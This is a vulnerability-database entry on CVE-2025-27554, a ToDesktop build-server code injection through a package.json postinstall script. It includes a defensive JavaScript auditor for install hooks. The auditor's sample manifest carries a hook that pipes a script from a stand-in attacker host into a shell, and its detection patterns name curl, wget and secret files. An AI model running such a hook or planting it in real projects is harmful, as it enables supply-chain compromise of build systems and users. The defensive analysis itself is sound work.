Cyber Resilience

CVE-2025-27554

Severity: Critical · Type: RCE

Published: 01 March 2025
Modified: 15 April 2026
KEV Added: not listed
Patch: ToDesktop 2024-10-03 or later
CVSS Score v3.1: 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
EPSS Score: 0.0058 (69.4th percentile)
Risk Priority: 20 (weighting: 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2025-27554 is a critical-severity Code Injection (CWE-94) vulnerability in ToDesktop, the desktop-app build and distribution service used by Cursor and other applications; NVD filed no CPE, so the affected product is inferred from the CVE description and its references. Its CVSS v3.1 base score is 9.9 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS places it in the top 30.6% of CVEs by exploit likelihood (69.4th percentile), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and CM-10 (Software Usage Restrictions).

Deeper analysis

CVE-2025-27554 is a code injection vulnerability (CWE-94) in ToDesktop before 2024-10-03, the build service used by Cursor before 2024-10-03 and other applications. The build server ran the postinstall script declared in a submitted application's package.json, so an attacker able to submit a build could execute arbitrary commands on that server, read secrets from the desktopify config.prod.json file, and then use what it found to deploy updates to any app built on the platform. The CVSS v3.1 base score of 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) reflects network reachability, low attack complexity, no user interaction, and a scope change: the compromised build server is a different security authority from the applications it signs and updates.

The PR:L rating means the attacker needs only a low-privileged foothold, in this case the ability to submit a build whose package.json the server processes, and no user interaction. Successful exploitation grants arbitrary command execution on the build server, exposes its configuration secrets, and lets the attacker push malicious updates to affected applications, turning a single build-pipeline flaw into a downstream supply-chain compromise of every app the platform ships.
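To make the mechanism concrete, the following is an added example (not ToDesktop's or Cursor's code, and not the exploit from the incident) of the control a build server can apply before it runs npm on a submitted manifest: enumerate the install-time lifecycle hooks in package.json, grade them, and install with hooks suppressed. The lifecycle hook names and the `--ignore-scripts` flag are real npm features; the sample manifests, the `attacker.invalid` host and the risk heuristics are constructed for illustration.

```javascript
'use strict';

// npm lifecycle scripts that run automatically during `npm install`; any
// command in one of them executes as the installing user on the build worker,
// which is the mechanism the CVE text describes ("via a postinstall script").
const LIFECYCLE_HOOKS = new Set([
  'preinstall', 'install', 'postinstall',
  'prepublish', 'preprepare', 'prepare', 'postprepare',
]);

// Heuristics (constructed for this example) for commands that should never
// run on a shared build worker without review.
const RISKY_PATTERNS = [
  { re: /\b(curl|wget)\b/i,        reason: 'fetches remote content during install' },
  { re: /\|\s*(sh|bash|zsh)\b/,    reason: 'pipes output into a shell' },
  { re: /\bnode\s+(-e|--eval)\b/,  reason: 'evaluates inline JavaScript' },
  { re: /\.(json|env|pem|key)\b/i, reason: 'touches a file that commonly holds secrets' },
];

// Return every lifecycle hook declared in a package.json, in file order.
function findLifecycleScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg && pkg.scripts && typeof pkg.scripts === 'object' ? pkg.scripts : {};
  return Object.entries(scripts)
    .filter(([name]) => LIFECYCLE_HOOKS.has(name))
    .map(([hook, command]) => ({ hook, command: String(command) }));
}

// Grade each hook: 'high' when a risky pattern matches, otherwise 'review'
// (an install-time hook still deserves a human look on a shared build server).
// `block` is true when the build should be refused outright.
function auditPackageJson(packageJsonText) {
  const findings = findLifecycleScripts(packageJsonText).map(({ hook, command }) => {
    const reasons = RISKY_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.reason);
    return { hook, command, severity: reasons.length ? 'high' : 'review', reasons };
  });
  return { findings, block: findings.some((f) => f.severity === 'high') };
}

// The install invocation a hardened build step runs instead of a bare
// `npm install`: `--ignore-scripts` suppresses every lifecycle hook, including
// those declared by transitive dependencies that the manifest audit never sees.
function hardenedInstallArgs() {
  return ['ci', '--ignore-scripts'];
}

// Constructed sample manifests (not taken from any real application).
const MALICIOUS_PACKAGE_JSON = JSON.stringify({
  name: 'example-app',
  version: '1.0.0',
  scripts: {
    build: 'electron-builder',
    postinstall: 'curl -s https://attacker.invalid/run.sh | sh',
  },
});

const REVIEW_PACKAGE_JSON = JSON.stringify({
  name: 'example-app',
  version: '1.0.0',
  scripts: { build: 'electron-builder', postinstall: 'electron-rebuild' },
});

const CLEAN_PACKAGE_JSON = JSON.stringify({
  name: 'example-app',
  version: '1.0.0',
  scripts: { build: 'electron-builder', test: 'jest' },
});

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, text] of [
    ['malicious', MALICIOUS_PACKAGE_JSON],
    ['review', REVIEW_PACKAGE_JSON],
    ['clean', CLEAN_PACKAGE_JSON],
  ]) {
    const result = auditPackageJson(text);
    console.log(label, result.block ? 'BLOCK' : 'allow', JSON.stringify(result.findings));
  }
  console.log('install with: npm', hardenedInstallArgs().join(' '));
}
```

`npm ci --ignore-scripts` (or `ignore-scripts=true` in the worker's .npmrc) also skips hooks that legitimate native modules rely on, so the workable pattern is to install with scripts off and then run one explicit, allowlisted build command. Treat the manifest audit as triage rather than a boundary: a hook can arrive through any dependency's package.json, so what actually contains the damage is running the build in a worker that holds no signing, deployment or customer credentials, which is exactly the separation the config.prod.json exposure in this CVE lacked.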

ToDesktop's security incident report (https://www.todesktop.com/blog/posts/security-incident-at-todesktop), the analysis at https://kibty.town/blog/todesktop that the CVE references, and the Hacker News discussion (https://news.ycombinator.com/item?id=43210858) describe the issue; the CVE itself was published on 2025-03-01. Mitigation is to be on ToDesktop 2024-10-03 or later, the version that addresses the handling of the postinstall script.

Per the CVE record, no exploitation occurred in the wild.


Vulnerability details

ToDesktop before 2024-10-03, as used by Cursor before 2024-10-03 and other applications, allows remote attackers to execute arbitrary commands on the build server (e.g., read secrets from the desktopify config.prod.json file), and consequently deploy updates to any app, via a postinstall script in package.json. No exploitation occurred.

CWE(s)

CWE-94 Improper Control of Generation of Code ('Code Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-mapped)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

T1059 Command and Scripting Interpreter (Execution)
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.

T1195.002 Compromise Software Supply Chain (Initial Access)
Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise.
Why these techniques?

The code injection (CWE-94) is reached through the build service's public submission path (T1190) and yields arbitrary command execution on the build server (T1059); the credentials obtained there let the attacker ship malicious updates to downstream apps, which is a software supply chain compromise (T1195.002).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-27577 (shared CWE-94)
CVE-2024-54756 (shared CWE-94)
CVE-2024-21760 (shared CWE-94)
CVE-2024-55028 (shared CWE-94)
CVE-2025-2303 (shared CWE-94)
CVE-2026-41258 (shared CWE-94)
CVE-2025-67847 (shared CWE-94)
CVE-2025-58764 (shared CWE-94)
CVE-2026-6543 (shared CWE-94)
CVE-2025-67979 (shared CWE-94)

Affected Assets

ToDesktop before 2024-10-03 (build service); downstream applications built with it, e.g. Cursor before 2024-10-03
Inferred from the CVE description and references (kibty.town is the blog that published the analysis, not the affected product); NVD did not file a CPE for this CVE.

Mitigating Controls (NIST 800-53 r5, AI-mapped)

SI-2 Flaw Remediation (prevent)
Requires timely installation of vendor patches for critical flaws like the postinstall script code injection in ToDesktop, directly eliminating the vulnerability.

Dependency scanning and monitoring (prevent · detect)
Enables scanning and monitoring of third-party dependencies such as ToDesktop npm packages to identify and address known CVEs like CVE-2025-27554 before exploitation.

CM-10 Software Usage Restrictions (prevent)
Restricts use of unapproved or vulnerable software such as pre-2024-10-03 ToDesktop versions and, applied to the build pipeline itself, keeps untrusted install-time scripts from being executed.
